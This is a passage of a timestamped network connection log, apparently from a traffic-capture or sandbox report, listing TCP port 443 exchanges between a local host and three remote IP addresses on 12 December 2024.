                                                                                                                                                                Dec 12, 2024 17:01:18.948884964 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.948925018 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.948973894 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.976751089 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.976880074 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.976891041 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.976938009 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.978851080 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.978903055 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.983211994 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.983261108 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.983428001 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.983477116 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.986824036 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.986876011 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.986965895 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.987006903 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.997437954 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.997487068 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.997576952 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.997617960 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:18.997623920 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:18.997673035 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.008430004 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.008492947 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.008555889 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.008598089 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.018973112 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.019026041 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.019088984 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.019129992 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.029249907 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.029297113 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.029402971 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.029447079 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.040235996 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.040288925 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.040328979 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.040371895 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.050273895 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.050344944 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.051078081 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.051126957 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.061587095 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.061692953 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.061705112 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.061750889 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.070115089 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.070200920 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.070213079 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.070259094 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.079633951 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.079711914 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.079749107 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.079813957 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.088890076 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.088951111 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.089030027 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.089073896 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.099412918 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.100003958 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.100008011 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.100049019 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.107542038 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.108562946 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.108567953 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.108608007 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.115962029 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.116028070 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.116070032 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.116115093 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.116118908 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.116161108 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.117319107 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.117368937 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.124502897 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.124581099 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.125271082 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.125330925 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.133018017 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.136332035 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.136358976 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.136404991 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.139724016 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.139789104 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.140842915 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.142456055 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.145356894 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.145423889 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.146585941 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.146635056 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.151542902 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.151628017 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.152401924 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.152457952 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.157656908 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.157716990 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.158941984 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.158998966 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.168931961 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.168997049 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.170119047 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.170180082 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.170733929 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.170787096 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.173594952 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.174515963 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.175821066 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.175869942 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.176953077 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.177000999 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.180799961 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.181180954 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.182166100 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.182216883 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.186175108 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.188081026 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.188105106 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.188148022 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.191265106 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.191322088 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.191442013 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.191482067 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.196194887 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.196260929 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.196346045 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.196391106 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.201242924 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.201301098 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.202120066 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.202224970 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.206489086 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.206545115 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.206556082 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.206600904 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.211550951 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.212927103 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.212944984 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.212980986 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.216711998 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.216761112 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.217009068 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.217051029 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.221610069 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.221771955 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.221776009 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.221822977 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.226489067 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.226552010 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.226622105 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.226665974 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.231128931 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.231178999 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.231307983 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.231355906 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.236556053 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.237669945 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.237677097 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.237720966 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.243336916 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.243382931 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.243652105 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.243695974 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.246803045 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.247198105 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.247201920 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.247247934 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.247308969 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.247347116 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.247374058 CET44349706172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.247395039 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.247416973 CET49706443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:19.545789957 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:19.545850039 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:19.545934916 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:19.546202898 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:19.546220064 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.762164116 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.762258053 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:20.765558004 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:20.765574932 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.765827894 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.765888929 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:20.766263962 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:20.807353020 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.977978945 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.978116989 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:20.991815090 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:20.991914988 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.099694967 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.100106955 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.103857040 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.103956938 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.103995085 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.104057074 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.169389009 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.169465065 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.171531916 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.171588898 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.179332972 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.179390907 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.179450989 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.179497004 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.187020063 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.187068939 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.189256907 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.189301014 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.197092056 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.197154999 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.198723078 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.198781013 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.206155062 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.206275940 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.229223013 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.229296923 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.230674982 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.230720043 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.230765104 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.230812073 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.231791973 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.231852055 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.231861115 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.231888056 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.231900930 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.231926918 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.236020088 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.236068964 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.236687899 CET49710443192.168.2.534.117.59.81
                                                                                                                                                                Dec 12, 2024 17:01:21.236706018 CET4434971034.117.59.81192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.239517927 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.239573002 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.242821932 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.242875099 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.252266884 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.252379894 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.255064011 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.255121946 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.265830040 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.265892029 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.268542051 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.268610001 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.279773951 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.279853106 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.282601118 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.282670021 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.293993950 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.294064999 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.294291973 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.294348955 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.307074070 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.307153940 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.307176113 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.307229996 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.320514917 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.320575953 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.362478018 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.362555981 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.363924026 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.363991022 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.364008904 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.364067078 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.368753910 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.368815899 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.373281002 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.373342991 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.374598980 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.374663115 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.374707937 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.374767065 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.380759001 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.380815983 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.380851984 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.380903959 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.380933046 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.380990028 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.391843081 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.391916037 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.392118931 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.392195940 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.404759884 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.404824972 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.405997038 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.406059027 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.415700912 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.415767908 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.415803909 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.415864944 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.422501087 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.422564030 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.422590017 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.422641993 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.432925940 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.432984114 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.433017015 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.433070898 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.440099955 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:21.440139055 CET44349712149.154.167.220192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.440198898 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:21.440458059 CET49712443192.168.2.5149.154.167.220
                                                                                                                                                                Dec 12, 2024 17:01:21.440469027 CET44349712149.154.167.220192.168.2.5
